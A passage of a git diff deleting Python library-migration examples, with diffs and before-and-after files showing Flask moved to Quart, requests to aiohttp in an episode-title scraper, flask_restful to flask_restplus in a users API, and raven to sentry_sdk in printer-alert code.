f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() - - return await resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff deleted file mode 100644 index 0934d62..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/app.py b/src/10-async-web/acityscape_api/app.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/app.py - +++ b/src/10-async-web/acityscape_api/app.py -@@ -1,4 +1,4 @@ --import flask -+import quart - from views import city_api - from views import home - from config import settings -@@ -6,7 +6,7 @@ import services.weather_service - import services.sun_service - import services.location_service - --app = flask.Flask(__name__) -+app = quart.Quart(__name__) - is_debug = True - - app.register_blueprint(home.blueprint) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py deleted file mode 100644 index 40eb65a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py +++ /dev/null @@ -1,34 +0,0 @@ -import flask -from views import city_api -from views import home -from config import settings -import services.weather_service -import services.sun_service -import services.location_service - -app = flask.Flask(__name__) -is_debug = True - -app.register_blueprint(home.blueprint) -app.register_blueprint(city_api.blueprint) - - -def configure_app(): - mode = 'dev' if is_debug else 'prod' - data = settings.load(mode) - - services.weather_service.global_init(data.get('weather_key')) - services.sun_service.use_cached_data = data.get('use_cached_data') - services.location_service.use_cached_data = data.get('use_cached_data') - - print("Using cached data? {}".format(data.get('use_cached_data'))) - - -def run_web_app(): - app.run(debug=is_debug, port=5001) - - -configure_app() - -if __name__ == '__main__': - run_web_app() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py deleted file mode 100644 index f72bf3a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py +++ /dev/null @@ -1,34 +0,0 @@ -import quart -from views import city_api -from views import home -from config import settings -import services.weather_service -import services.sun_service -import services.location_service - -app = quart.Quart(__name__) -is_debug = True - -app.register_blueprint(home.blueprint) -app.register_blueprint(city_api.blueprint) - - -def configure_app(): - mode = 'dev' if is_debug else 'prod' - data = settings.load(mode) - - services.weather_service.global_init(data.get('weather_key')) - services.sun_service.use_cached_data = data.get('use_cached_data') - services.location_service.use_cached_data = data.get('use_cached_data') - - print("Using cached data? {}".format(data.get('use_cached_data'))) - - -def run_web_app(): - app.run(debug=is_debug, port=5001) - - -configure_app() - -if __name__ == '__main__': - run_web_app() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff deleted file mode 100644 index 5e1e35b..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/views/city_api.py b/src/10-async-web/acityscape_api/views/city_api.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/views/city_api.py - +++ b/src/10-async-web/acityscape_api/views/city_api.py -@@ -1,15 +1,15 @@ --import flask -+import quart - from services import weather_service, sun_service, location_service - --blueprint = flask.blueprints.Blueprint(__name__, __name__) -+blueprint = quart.blueprints.Blueprint(__name__, __name__) - - - @blueprint.route('/api/weather//', methods=['GET']) - def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: -- flask.abort(404) -- return flask.jsonify(weather_data) -+ quart.abort(404) -+ return quart.jsonify(weather_data) - - - @blueprint.route('/api/sun//', methods=['GET']) -@@ -17,5 +17,5 @@ def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: -- flask.abort(404) -- return flask.jsonify(sun_data) -+ quart.abort(404) -+ return quart.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py deleted file mode 100644 index 8b238c0..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py +++ /dev/null @@ -1,21 +0,0 @@ -import flask -from services import weather_service, sun_service, location_service - -blueprint = flask.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/api/weather//', methods=['GET']) -def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: - flask.abort(404) - return flask.jsonify(weather_data) - - -@blueprint.route('/api/sun//', methods=['GET']) -def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: - flask.abort(404) - return flask.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py deleted file mode 100644 index a7682bb..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py +++ /dev/null @@ -1,21 +0,0 @@ -import quart -from services import weather_service, sun_service, location_service - -blueprint = quart.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/api/weather//', methods=['GET']) -def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: - quart.abort(404) - return quart.jsonify(weather_data) - - -@blueprint.route('/api/sun//', methods=['GET']) -def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: - quart.abort(404) - return quart.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff deleted file mode 100644 index 89ce66a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/views/home.py b/src/10-async-web/acityscape_api/views/home.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/views/home.py - +++ b/src/10-async-web/acityscape_api/views/home.py -@@ -1,6 +1,6 @@ --import flask -+import quart - --blueprint = flask.blueprints.Blueprint(__name__, __name__) -+blueprint = quart.blueprints.Blueprint(__name__, __name__) - - - @blueprint.route('/') -@@ -12,4 +12,4 @@ def index(): - - @blueprint.errorhandler(404) - def not_found(_): -- return flask.Response("The page was not found.", status=404) -+ return quart.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py deleted file mode 100644 index cb725eb..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py +++ /dev/null @@ -1,15 +0,0 @@ -import flask - -blueprint = flask.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/') -def index(): - return "Welcome to the city_scape API. " \ - "Use /api/sun/[zipcode]/[country code (e.g. us)] and" \ - "/api/weather/[zipcode]/[country code (e.g. us)] for API calls." - - -@blueprint.errorhandler(404) -def not_found(_): - return flask.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py deleted file mode 100644 index 432d5de..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py +++ /dev/null @@ -1,15 +0,0 @@ -import quart - -blueprint = quart.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/') -def index(): - return "Welcome to the city_scape API. " \ - "Use /api/sun/[zipcode]/[country code (e.g. us)] and" \ - "/api/weather/[zipcode]/[country code (e.g. us)] for API calls." - - -@blueprint.errorhandler(404) -def not_found(_): - return quart.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff deleted file mode 100644 index 5010b6e..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff +++ /dev/null @@ -1,63 +0,0 @@ -diff --git a/src/04-asyncio/web_scraping/async_scrape/program.py b/src/04-asyncio/web_scraping/async_scrape/program.py - index c130fe5f3b19c54ee39ce0ebe924947f339111fb..ab4e5fdd32982c97e9701d3e1fdb8c39882d4250 100644 - --- a/src/04-asyncio/web_scraping/async_scrape/program.py - +++ b/src/04-asyncio/web_scraping/async_scrape/program.py -@@ -1,16 +1,20 @@ --import requests -+import asyncio -+ -+import aiohttp - import bs4 - from colorama import Fore - - --def get_html(episode_number: int) -> str: -+async def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' -- resp = requests.get(url) -- resp.raise_for_status() - -- return resp.text -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() -+ -+ return await resp.text() - - - def get_title(html: str, episode_number: int) -> str: -@@ -24,14 +28,28 @@ def get_title(html: str, episode_number: int) -> str: - - - def main(): -- get_title_range() -+ loop = asyncio.get_event_loop() -+ loop.run_until_complete(get_title_range()) - print("Done.") - - --def get_title_range(): -+async def get_title_range_old_version(): - # Please keep this range pretty small to not DDoS my site. ;) -- for n in range(150, 170): -- html = get_html(n) -+ for n in range(150, 160): -+ html = await get_html(n) -+ title = get_title(html, n) -+ print(Fore.WHITE + f"Title found: {title}", flush=True) -+ -+ -+async def get_title_range(): -+ # Please keep this range pretty small to not DDoS my site. ;) -+ -+ tasks = [] -+ for n in range(150, 160): -+ tasks.append((n, asyncio.create_task(get_html(n)))) -+ -+ for n, t in tasks: -+ html = await t - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py deleted file mode 100644 index ac733a9..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -import requests -import bs4 -from colorama import Fore - - -def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' - resp = requests.get(url) - resp.raise_for_status() - - return resp.text - - -def get_title(html: str, episode_number: int) -> str: - print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True) - soup = bs4.BeautifulSoup(html, 'html.parser') - header = soup.select_one('h1') - if not header: - return "MISSING" - - return header.text.strip() - - -def main(): - get_title_range() - print("Done.") - - -def get_title_range(): - # Please keep this range pretty small to not DDoS my site. ;) - for n in range(150, 170): - html = get_html(n) - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py deleted file mode 100644 index 275fccd..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.target.py +++ /dev/null @@ -1,58 +0,0 @@ -import asyncio - -import aiohttp -import bs4 -from colorama import Fore - - -async def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' - - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() - - return await resp.text() - - -def get_title(html: str, episode_number: int) -> str: - print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True) - soup = bs4.BeautifulSoup(html, 'html.parser') - header = soup.select_one('h1') - if not header: - return "MISSING" - - return header.text.strip() - - -def main(): - loop = asyncio.get_event_loop() - loop.run_until_complete(get_title_range()) - print("Done.") - - -async def get_title_range_old_version(): - # Please keep this range pretty small to not DDoS my site. ;) - for n in range(150, 160): - html = await get_html(n) - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -async def get_title_range(): - # Please keep this range pretty small to not DDoS my site. ;) - - tasks = [] - for n in range(150, 160): - tasks.append((n, asyncio.create_task(get_html(n)))) - - for n, t in tasks: - html = await t - title = get_title(html, n) - print(Fore.WHITE + f"Title found: {title}", flush=True) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff deleted file mode 100644 index 49bda0e..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/services/users/project/api/ping.py b/services/users/project/api/ping.py - index e1a19f2f7896acaa0aa00d85f6370aa40c77bb6f..d4119a0f609b151df99b2250e419c168e688a0c6 100644 - --- a/services/users/project/api/ping.py - +++ b/services/users/project/api/ping.py -@@ -1,11 +1,9 @@ --# project/api/ping.py -+# services/users/project/api/ping.py - - --from flask import Blueprint --from flask_restful import Api, Resource -+from flask_restplus import Namespace, Resource - --ping_blueprint = Blueprint("ping", __name__) --api = Api(ping_blueprint) -+ping_namespace = Namespace("ping") - - - class Ping(Resource): -@@ -13,4 +11,4 @@ class Ping(Resource): - return {"status": "success", "message": "pong!"} - - --api.add_resource(Ping, "/ping") -+ping_namespace.add_resource(Ping, "") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py deleted file mode 100644 index d935014..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.source.py +++ /dev/null @@ -1,16 +0,0 @@ -# project/api/ping.py - - -from flask import Blueprint -from flask_restful import Api, Resource - -ping_blueprint = Blueprint("ping", __name__) -api = Api(ping_blueprint) - - -class Ping(Resource): - def get(self): - return {"status": "success", "message": "pong!"} - - -api.add_resource(Ping, "/ping") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py deleted file mode 100644 index 8113470..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$ping.py.target.py +++ /dev/null @@ -1,14 +0,0 @@ -# services/users/project/api/ping.py - - -from flask_restplus import Namespace, Resource - -ping_namespace = Namespace("ping") - - -class Ping(Resource): - def get(self): - return {"status": "success", "message": "pong!"} - - -ping_namespace.add_resource(Ping, "") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff deleted file mode 100644 index 64007f9..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.diff +++ /dev/null @@ -1,190 +0,0 @@ -diff --git a/services/users/project/api/users/views.py b/services/users/project/api/users/views.py - index e1a19f2f7896acaa0aa00d85f6370aa40c77bb6f..d4119a0f609b151df99b2250e419c168e688a0c6 100644 - --- a/services/users/project/api/users/views.py - +++ b/services/users/project/api/users/views.py -@@ -1,113 +1,97 @@ --# project/api/users/views.py -+# services/users/project/api/users/views.py - - --from flask import Blueprint, request --from flask_restful import Api, Resource --from sqlalchemy import exc -+from flask import request -+from flask_restplus import Resource, fields, Namespace - --from project import db --from project.api.users.models import User -+from project.api.users.services import ( -+ get_all_users, -+ get_user_by_email, -+ add_user, -+ get_user_by_id, -+ update_user, -+ delete_user, -+) - --users_blueprint = Blueprint("users", __name__) --api = Api(users_blueprint) -+ -+users_namespace = Namespace("users") -+ -+user = users_namespace.model( -+ "User", -+ { -+ "id": fields.Integer(readOnly=True), -+ "username": fields.String(required=True), -+ "email": fields.String(required=True), -+ "created_date": fields.DateTime, -+ }, -+) - - - class UsersList(Resource): -+ @users_namespace.marshal_with(user, as_list=True) - def get(self): -- response_object = { -- "status": "success", -- "data": {"users": [user.to_json() for user in User.query.all()]}, -- } -- return response_object, 200 -+ """Returns all users.""" -+ return get_all_users(), 200 - -+ @users_namespace.expect(user, validate=True) -+ @users_namespace.response(201, " was added!") -+ @users_namespace.response(400, "Sorry. That email already exists.") - def post(self): -+ """Creates a new user.""" - post_data = request.get_json() -- response_object = {"status": "fail", "message": "Invalid payload."} -- if not post_data: -- return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") -- password = post_data.get("password") -- try: -- user = User.query.filter_by(email=email).first() -- if not user: -- db.session.add(User(username=username, email=email, password=password)) -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{email} was added!" -- return response_object, 201 -- else: -- response_object["message"] = "Sorry. That email already exists." -- return response_object, 400 -- except exc.IntegrityError: -- db.session.rollback() -- return response_object, 400 -- except (exc.IntegrityError, ValueError): -- db.session.rollback() -+ response_object = {} -+ -+ user = get_user_by_email(email) -+ if user: -+ response_object["message"] = "Sorry. That email already exists." - return response_object, 400 -+ add_user(username, email) -+ response_object["message"] = f"{email} was added!" -+ return response_object, 201 - - - class Users(Resource): -+ @users_namespace.marshal_with(user) -+ @users_namespace.response(200, "Success") -+ @users_namespace.response(404, "User does not exist") - def get(self, user_id): -- response_object = {"status": "fail", "message": "User does not exist"} -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if not user: -- return response_object, 404 -- else: -- response_object = { -- "status": "success", -- "data": { -- "id": user.id, -- "username": user.username, -- "email": user.email, -- "active": user.active, -- }, -- } -- return response_object, 200 -- except ValueError: -- return response_object, 404 -+ """Returns a single user.""" -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ return user, 200 - -+ @users_namespace.expect(user, validate=True) -+ @users_namespace.response(200, " was updated!") -+ @users_namespace.response(404, "User does not exist") - def put(self, user_id): -+ """Updates a user.""" - post_data = request.get_json() -- response_object = {"status": "fail", "message": "Invalid payload."} -- if not post_data: -- return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") -- if not username or not email: -- return response_object, 400 -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if user: -- user.username = username -- user.email = email -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{user.id} was updated!" -- return response_object, 200 -- else: -- response_object["message"] = "User does not exist." -- return response_object, 404 -- except exc.IntegrityError: -- db.session.rollback() -- return response_object, 400 -+ response_object = {} -+ -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ update_user(user, username, email) -+ response_object["message"] = f"{user.id} was updated!" -+ return response_object, 200 - -+ @users_namespace.response(200, " was removed!") -+ @users_namespace.response(404, "User does not exist") - def delete(self, user_id): -- response_object = {"status": "fail", "message": "User does not exist"} -- try: -- user = User.query.filter_by(id=int(user_id)).first() -- if not user: -- return response_object, 404 -- else: -- db.session.delete(user) -- db.session.commit() -- response_object["status"] = "success" -- response_object["message"] = f"{user.email} was removed!" -- return response_object, 200 -- except ValueError: -- return response_object, 404 -- -- --api.add_resource(UsersList, "/users") --api.add_resource(Users, "/users/") -+ """Updates a user.""" -+ response_object = {} -+ user = get_user_by_id(user_id) -+ if not user: -+ users_namespace.abort(404, f"User {user_id} does not exist") -+ delete_user(user) -+ response_object["message"] = f"{user.email} was removed!" -+ return response_object, 200 -+ -+ -+users_namespace.add_resource(UsersList, "") -+users_namespace.add_resource(Users, "/") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py deleted file mode 100644 index 72d5530..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.source.py +++ /dev/null @@ -1,113 +0,0 @@ -# project/api/users/views.py - - -from flask import Blueprint, request -from flask_restful import Api, Resource -from sqlalchemy import exc - -from project import db -from project.api.users.models import User - -users_blueprint = Blueprint("users", __name__) -api = Api(users_blueprint) - - -class UsersList(Resource): - def get(self): - response_object = { - "status": "success", - "data": {"users": [user.to_json() for user in User.query.all()]}, - } - return response_object, 200 - - def post(self): - post_data = request.get_json() - response_object = {"status": "fail", "message": "Invalid payload."} - if not post_data: - return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") - password = post_data.get("password") - try: - user = User.query.filter_by(email=email).first() - if not user: - db.session.add(User(username=username, email=email, password=password)) - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{email} was added!" - return response_object, 201 - else: - response_object["message"] = "Sorry. That email already exists." - return response_object, 400 - except exc.IntegrityError: - db.session.rollback() - return response_object, 400 - except (exc.IntegrityError, ValueError): - db.session.rollback() - return response_object, 400 - - -class Users(Resource): - def get(self, user_id): - response_object = {"status": "fail", "message": "User does not exist"} - try: - user = User.query.filter_by(id=int(user_id)).first() - if not user: - return response_object, 404 - else: - response_object = { - "status": "success", - "data": { - "id": user.id, - "username": user.username, - "email": user.email, - "active": user.active, - }, - } - return response_object, 200 - except ValueError: - return response_object, 404 - - def put(self, user_id): - post_data = request.get_json() - response_object = {"status": "fail", "message": "Invalid payload."} - if not post_data: - return response_object, 400 - username = post_data.get("username") - email = post_data.get("email") - if not username or not email: - return response_object, 400 - try: - user = User.query.filter_by(id=int(user_id)).first() - if user: - user.username = username - user.email = email - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{user.id} was updated!" - return response_object, 200 - else: - response_object["message"] = "User does not exist." - return response_object, 404 - except exc.IntegrityError: - db.session.rollback() - return response_object, 400 - - def delete(self, user_id): - response_object = {"status": "fail", "message": "User does not exist"} - try: - user = User.query.filter_by(id=int(user_id)).first() - if not user: - return response_object, 404 - else: - db.session.delete(user) - db.session.commit() - response_object["status"] = "success" - response_object["message"] = f"{user.email} was removed!" - return response_object, 200 - except ValueError: - return response_object, 404 - - -api.add_resource(UsersList, "/users") -api.add_resource(Users, "/users/") diff --git a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py b/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py deleted file mode 100644 index 2402859..0000000 --- a/v1/data/codefile/testdrivenio@flask-react-aws__d4119a0__services$users$project$api$users$views.py.target.py +++ /dev/null @@ -1,97 +0,0 @@ -# services/users/project/api/users/views.py - - -from flask import request -from flask_restplus import Resource, fields, Namespace - -from project.api.users.services import ( - get_all_users, - get_user_by_email, - add_user, - get_user_by_id, - update_user, - delete_user, -) - - -users_namespace = Namespace("users") - -user = users_namespace.model( - "User", - { - "id": fields.Integer(readOnly=True), - "username": fields.String(required=True), - "email": fields.String(required=True), - "created_date": fields.DateTime, - }, -) - - -class UsersList(Resource): - @users_namespace.marshal_with(user, as_list=True) - def get(self): - """Returns all users.""" - return get_all_users(), 200 - - @users_namespace.expect(user, validate=True) - @users_namespace.response(201, " was added!") - @users_namespace.response(400, "Sorry. That email already exists.") - def post(self): - """Creates a new user.""" - post_data = request.get_json() - username = post_data.get("username") - email = post_data.get("email") - response_object = {} - - user = get_user_by_email(email) - if user: - response_object["message"] = "Sorry. That email already exists." - return response_object, 400 - add_user(username, email) - response_object["message"] = f"{email} was added!" - return response_object, 201 - - -class Users(Resource): - @users_namespace.marshal_with(user) - @users_namespace.response(200, "Success") - @users_namespace.response(404, "User does not exist") - def get(self, user_id): - """Returns a single user.""" - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - return user, 200 - - @users_namespace.expect(user, validate=True) - @users_namespace.response(200, " was updated!") - @users_namespace.response(404, "User does not exist") - def put(self, user_id): - """Updates a user.""" - post_data = request.get_json() - username = post_data.get("username") - email = post_data.get("email") - response_object = {} - - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - update_user(user, username, email) - response_object["message"] = f"{user.id} was updated!" - return response_object, 200 - - @users_namespace.response(200, " was removed!") - @users_namespace.response(404, "User does not exist") - def delete(self, user_id): - """Updates a user.""" - response_object = {} - user = get_user_by_id(user_id) - if not user: - users_namespace.abort(404, f"User {user_id} does not exist") - delete_user(user) - response_object["message"] = f"{user.email} was removed!" - return response_object, 200 - - -users_namespace.add_resource(UsersList, "") -users_namespace.add_resource(Users, "/") diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff deleted file mode 100644 index d9eca03..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.diff +++ /dev/null @@ -1,78 +0,0 @@ -diff --git a/web/app/notifications.py b/web/app/notifications.py - index 9f586b7684f78d9cf0d1ab8e4f465133d6212346..b86b375952cc3e965c32201caa8094998c56cde7 100644 - --- a/web/app/notifications.py - +++ b/web/app/notifications.py -@@ -10,7 +10,7 @@ import requests - import logging - from urllib.parse import urlparse - import ipaddress --from raven.contrib.django.raven_compat.models import client as sentryClient -+from sentry_sdk import capture_exception - import smtplib - import backoff - -@@ -41,29 +41,29 @@ def send_failure_alert(printer, is_warning=True, print_paused=False): - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: -- sentryClient.captureException() -+ capture_exception() - - - def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): -@@ -247,25 +247,25 @@ def send_print_notification(_print, extra_ctx={}): - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.print_notification_by_telegram: - send_print_notification_telegram(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: -- sentryClient.captureException() -+ capture_exception() - - - def send_print_notification_email(_print, extra_ctx={}): diff --git a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py b/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py deleted file mode 100644 index c332eff..0000000 --- a/v1/data/codefile/thespaghettidetective@thespaghettidetective__b86b375__web$app$notifications.py.source.py +++ /dev/null @@ -1,427 +0,0 @@ -from allauth.account.admin import EmailAddress -from django.template.loader import render_to_string, get_template -from django.core.mail import EmailMessage -from datetime import datetime, timedelta -from django.utils import timezone -from twilio.rest import Client -from django.conf import settings -from pushbullet import Pushbullet, PushbulletError, PushError -import requests -import logging -from urllib.parse import urlparse -import ipaddress -from raven.contrib.django.raven_compat.models import client as sentryClient -import smtplib -import backoff - -from lib.file_storage import save_file_obj -from lib.utils import save_print_snapshot, last_pic_of_print -from app.models import Printer, Print -from app.telegram_bot import send_notification as send_telegram_notification -from lib import site - -LOGGER = logging.getLogger(__name__) - - -def send_failure_alert(printer, is_warning=True, print_paused=False): - 